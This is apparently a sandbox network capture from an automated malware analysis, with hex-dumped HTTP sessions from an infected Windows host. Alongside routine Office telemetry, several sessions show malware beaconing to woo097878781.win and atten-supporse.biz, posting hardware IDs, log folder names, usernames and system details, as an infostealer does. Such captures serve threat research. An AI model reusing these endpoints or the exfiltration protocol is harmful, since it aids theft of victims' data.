3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
134	192.168.2.4	49914	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:58 UTC	192	OUT	GET /rules/rule701051v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:58 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:58 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT ETag: "0x8DC582BE1CC18CD" x-ms-request-id: 1f576be4-501e-008f-5405-489054000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185358Z-r1cf579d778qgtz2hC1EWRmgks000000061g0000000020th x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:58 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
135	192.168.2.4	49920	154.216.20.243	443	1220	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:58 UTC	234	OUT	POST /upload.php HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=part Host: woo097878781.win User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 Content-Length: 419
2024-12-08 18:53:58 UTC	403	OUT	Data Raw: 2d 2d 70 61 72 74 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 48 57 49 44 5f 64 66 30 38 36 39 62 37 64 36 32 62 61 36 61 38 32 63 66 32 30 64 33 66 66 61 33 37 36 61 62 65 0d 0a 2d 2d 70 61 72 74 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 6f 67 66 6f 6c 64 65 72 6e 61 6d 65 22 0d 0a 0d 0a 36 36 0d 0a 2d 2d 70 61 72 74 0d Data Ascii: --partContent-Type: text/plain; charset="UTF-8"Content-Disposition: form-data; name="hwid"HWID_df0869b7d62ba6a82cf20d3ffa376abe--partContent-Type: text/plain; charset="UTF-8"Content-Disposition: form-data; name="logfoldername"66--part
2024-12-08 18:53:58 UTC	6	OUT	Data Raw: 0d 00 0a 00 00 00 Data Ascii:
2024-12-08 18:53:58 UTC	10	OUT	Data Raw: 0d 0a 2d 2d 70 61 72 74 2d 2d Data Ascii: --part--
2024-12-08 18:53:59 UTC	231	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 08 Dec 2024 18:53:59 GMT Content-Type: text/plain;charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.3.14 Vary: Accept-Encoding X-Powered-By: PleskLin
2024-12-08 18:53:59 UTC	11	IN	Data Raw: 31 0d 0a 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 110

Session ID	Source IP	Source Port	Destination IP	Destination Port
136	192.168.2.4	49926	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:54:00 UTC	192	OUT	GET /rules/rule702501v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:54:00 UTC	515	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:54:00 GMT Content-Type: text/xml Content-Length: 1415 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT ETag: "0x8DC582BE7C66E85" x-ms-request-id: 13315da1-a01e-006f-587e-4913cd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185400Z-r1cf579d778pftsbhC1EWRa0gn00000000t0000000001823 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-12-08 18:54:00 UTC	1415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan

Session ID	Source IP	Source Port	Destination IP	Destination Port
137	192.168.2.4	49925	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:54:00 UTC	192	OUT	GET /rules/rule703401v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:54:00 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:54:00 GMT Content-Type: text/xml Content-Length: 1425 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT ETag: "0x8DC582BE6BD89A1" x-ms-request-id: b9413899-901e-0015-7203-48b284000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185400Z-r1cf579d778w59f9hC1EWRze6w00000006d00000000060yq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:54:00 UTC	1425	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus

Session ID	Source IP	Source Port	Destination IP	Destination Port
138	192.168.2.4	49923	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:54:00 UTC	192	OUT	GET /rules/rule702300v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:54:00 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:54:00 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT ETag: "0x8DC582BDC13EFEF" x-ms-request-id: 73f3c7cf-101e-0034-22fc-4896ff000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185400Z-r1cf579d778v97q7hC1EWRf95c00000005tg000000003yy0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:54:00 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
139	192.168.2.4	49924	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:54:00 UTC	192	OUT	GET /rules/rule703400v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:54:00 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:54:00 GMT Content-Type: text/xml Content-Length: 1388 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT ETag: "0x8DC582BDBD9126E" x-ms-request-id: 4471680c-501e-0047-7105-48ce6c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185400Z-r1cf579d778t5c2lhC1EWRce3w00000006v00000000051m0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:54:00 UTC	1388	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
140	192.168.2.4	49929	104.21.16.9	443	8128	C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:54:00 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=2WX2JHLW User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1298 Host: atten-supporse.biz
2024-12-08 18:54:00 UTC	1298	OUT	Data Raw: 2d 2d 32 57 58 32 4a 48 4c 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 38 33 42 39 45 39 32 32 41 37 31 36 46 31 30 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 32 57 58 32 4a 48 4c 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 57 58 32 4a 48 4c 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 32 57 58 32 4a 48 4c 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 Data Ascii: --2WX2JHLWContent-Disposition: form-data; name="hwid"683B9E922A716F1023D904AF30EFEBBC--2WX2JHLWContent-Disposition: form-data; name="pid"1--2WX2JHLWContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--2WX2JHLWContent-Di
2024-12-08 18:54:01 UTC	1022	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:54:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=m32g3emas54trhqkr7m3t3oqqa; expires=Thu, 03-Apr-2025 12:40:39 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G%2BzGy8hzV5QI8ekUu7PRO3K1QlEJytyDn0PB4J%2F0Z4wnoWUWZqhT3BSoedU5FW8LyRmfMx4yqg%2Fl%2BUOtN74gv2IJ4mx0h1DUgwAn8EzPDATKK%2F4iNakKtpSqNIOVlP8ysvZwSHY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eeef625cfa4423a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=82849&min_rtt=75520&rtt_var=33555&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2207&delivery_rate=38665&cwnd=170&unsent_bytes=0&cid=5a9515ab4f8a3c3f&ts=808&x=0"
2024-12-08 18:54:01 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-08 18:54:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
141	192.168.2.4	49928	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:54:00 UTC	192	OUT	GET /rules/rule702500v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:54:00 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:54:00 GMT Content-Type: text/xml Content-Length: 1378 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT ETag: "0x8DC582BDB813B3F" x-ms-request-id: af039603-701e-005c-3603-48bb94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185400Z-r1cf579d778zvkpnhC1EWRv23g00000006bg0000000084eq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:54:00 UTC	1378	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
142	192.168.2.4	49933	154.216.20.243	443	1220	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:54:01 UTC	234	OUT	POST /upload.php HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=part Host: woo097878781.win User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 Content-Length: 414
2024-12-08 18:54:01 UTC	402	OUT	Data Raw: 2d 2d 70 61 72 74 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 48 57 49 44 5f 64 66 30 38 36 39 62 37 64 36 32 62 61 36 61 38 32 63 66 32 30 64 33 66 66 61 33 37 36 61 62 65 0d 0a 2d 2d 70 61 72 74 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 6f 67 66 6f 6c 64 65 72 6e 61 6d 65 22 0d 0a 0d 0a 36 36 0d 0a 2d 2d 70 61 72 74 0d Data Ascii: --partContent-Type: text/plain; charset="UTF-8"Content-Disposition: form-data; name="hwid"HWID_df0869b7d62ba6a82cf20d3ffa376abe--partContent-Type: text/plain; charset="UTF-8"Content-Disposition: form-data; name="logfoldername"66--part
2024-12-08 18:54:01 UTC	2	OUT	Data Raw: 00 00 Data Ascii:
2024-12-08 18:54:01 UTC	10	OUT	Data Raw: 0d 0a 2d 2d 70 61 72 74 2d 2d Data Ascii: --part--
2024-12-08 18:54:01 UTC	231	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 08 Dec 2024 18:54:01 GMT Content-Type: text/plain;charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.3.14 Vary: Accept-Encoding X-Powered-By: PleskLin
2024-12-08 18:54:01 UTC	11	IN	Data Raw: 31 0d 0a 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 110

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
143	192.168.2.4	49932	104.21.16.9	443	6224	C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:54:01 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: atten-supporse.biz
2024-12-08 18:54:01 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-08 18:54:01 UTC	1016	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:54:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1lpb04u8dm9n3g0tlj11dc7fvm; expires=Thu, 03-Apr-2025 12:40:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ce9Mx0wQ3aNWOVA8cn7JuDCk%2FcmtG4KVS4rDc451K6LjYnufKO8u6OOdGn41mo6gm0Zk0GbRPdibjUx1N5bamJdpUzIWDMVYG9NX1YKzEQU09L5fP7TGXnUR%2FRzkyr9g2gc6fyk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eeef62ac80403d5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=16214&min_rtt=2177&rtt_var=9326&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1341295&cwnd=226&unsent_bytes=0&cid=2e002d045a7217bd&ts=1184&x=0"
2024-12-08 18:54:01 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-08 18:54:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
144	192.168.2.4	49937	154.216.20.243	443	6952	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:54:01 UTC	179	OUT	POST /66/api/endpoint.php HTTP/1.1 Accept: / Connection: close Content-Length: 308 Content-Type: application/json Host: woo097878781.win User-Agent: cpp-httplib/0.12.6
2024-12-08 18:54:01 UTC	308	OUT	Data Raw: 7b 22 69 64 22 3a 22 6d 63 68 73 72 78 74 61 64 75 77 74 70 67 6a 78 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 35 30 36 34 30 37 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6a 6f 6e 65 73 22 2c 22 67 70 75 22 3a 22 45 33 47 52 42 4c 56 46 55 22 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 72 65 6d 6f 74 65 63 6f 6e 66 69 67 22 3a 22 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 33 2e 34 2e 31 22 2c 22 61 63 74 69 76 65 77 69 6e 64 6f 77 22 3a 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 5c 5c 65 78 70 6c 6f 72 65 72 2e 65 78 65 20 2d 20 50 72 Data Ascii: {"id":"mchsrxtaduwtpgjx","computername":"506407","username":"user","gpu":"E3GRBLVFU","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Pr
2024-12-08 18:54:02 UTC	264	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 08 Dec 2024 18:54:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.3.14 X-Robots-Tag: noindex, nofollow Vary: Accept-Encoding X-Powered-By: PleskLin
2024-12-08 18:54:02 UTC	28	IN	Data Raw: 31 31 0d 0a 7b 22 72 65 73 70 6f 6e 73 65 22 3a 22 6f 6b 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 11{"response":"ok"}0

Session ID	Source IP	Source Port	Destination IP	Destination Port
145	192.168.2.4	49938	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:54:02 UTC	192	OUT	GET /rules/rule700501v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
